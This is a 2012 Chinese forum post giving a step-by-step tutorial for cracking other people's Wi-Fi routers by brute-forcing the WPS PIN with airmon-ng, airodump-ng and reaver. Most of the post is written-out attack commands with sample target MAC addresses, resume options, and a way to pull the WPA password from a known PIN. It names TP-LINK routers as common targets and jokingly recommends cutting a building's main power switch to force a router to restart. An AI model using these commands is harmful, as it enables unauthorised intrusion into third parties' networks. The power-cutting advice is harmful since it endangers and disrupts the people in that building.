|
|
PJ进度表保存路径:
1.3版:
/etc/reaver/MAC地址.wpc
1.4版:
/usr/local/etc/reaver/MAC地址.wpc
PJ步骤:
打开 ROOt shell
如果电脑装有多个无线网卡,请先发指令ifconfig -a
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例:
激活监听模式:airmon-ng start wlan0
监控:airodump-ng -w cap mon0
抓PIN码:reaver -i mon0 -b MAC -a -S -vv
《 mac是目标的路由器mac》
例如:reaver -i mon0 -b C8:3A:35:09:B2:08 -vv
按Ctrl+C终止PJ
按方向键 上 可以找到以前输入的
程序默认每尝试后停止一秒,加入参数使之不停止:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v -d 0
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)会从指定PIN段起破密。
99.99%问题不用重新跑可以用
reaver -i mon0 -b mac --pin=XXXX -vv
XXXX=已经跑出的前4位数字
如果PJ过程中按Ctrl+C终止PJ,reaver会自动保存进度。下次PJ时会自动提示,按y继续,按n重新PJ。
按方向键 "上" 可以找到以前输入的命令参数
-p参数:-p PIN可以让你在获取到PIN的情况下直接得到路由WPA密码!
reaver -i mon0 -b MAC -p PIN
注:PIN 思考中,信号质量也很好的情况下,突然出现同码循环和大量timeout,可能是如下原因造成的(排除关机状态)。
reaver 只支持11N 的PIN 破密,11n先验证前4码,11g也有PIN功能,但只能是全码验证。
现在多数AP 的无线模式是混和11bgn,当有11g 设备接入时,AP 自动从11N 降至11g,
此时,reaver 会出现同码循环重复timeout! 甚至会出现WARNING: Failed to associate with
XX:XX:XX:XX:XX:XX (ESSID: XXXX)实证中,在排除同频干扰因素后,通过扫描无线网络,发现路由器,确实从54e.模式降为54.模式了。有人把此种现象称为临时性WPS、PIN 功能自锁从收集情况分析,目前破密的主要是TP-LINK 的路由器!
解决办法:
等待这个11g 设备退出无线接入,断电重启,AP 自动从11g 恢复至11N 模式。如果遇到
上很长很长时间不重启的顽固AP,我想最有效的办法就是我们动手帮它重启,找到附近
(路由器一定离我们不远)楼内单位总电源开关!下步该知道怎么办了吧————终极
秘籍:拉开关断电,再推上开关,回家继续PIN!哈哈,希望大家开心,不失为实用冒险的办法,行前请谨慎! |
|
IP卡
狗仔卡
发表于 2012-7-15 05:25
置顶卡
沉默卡
喧嚣卡
顶贴卡
显身卡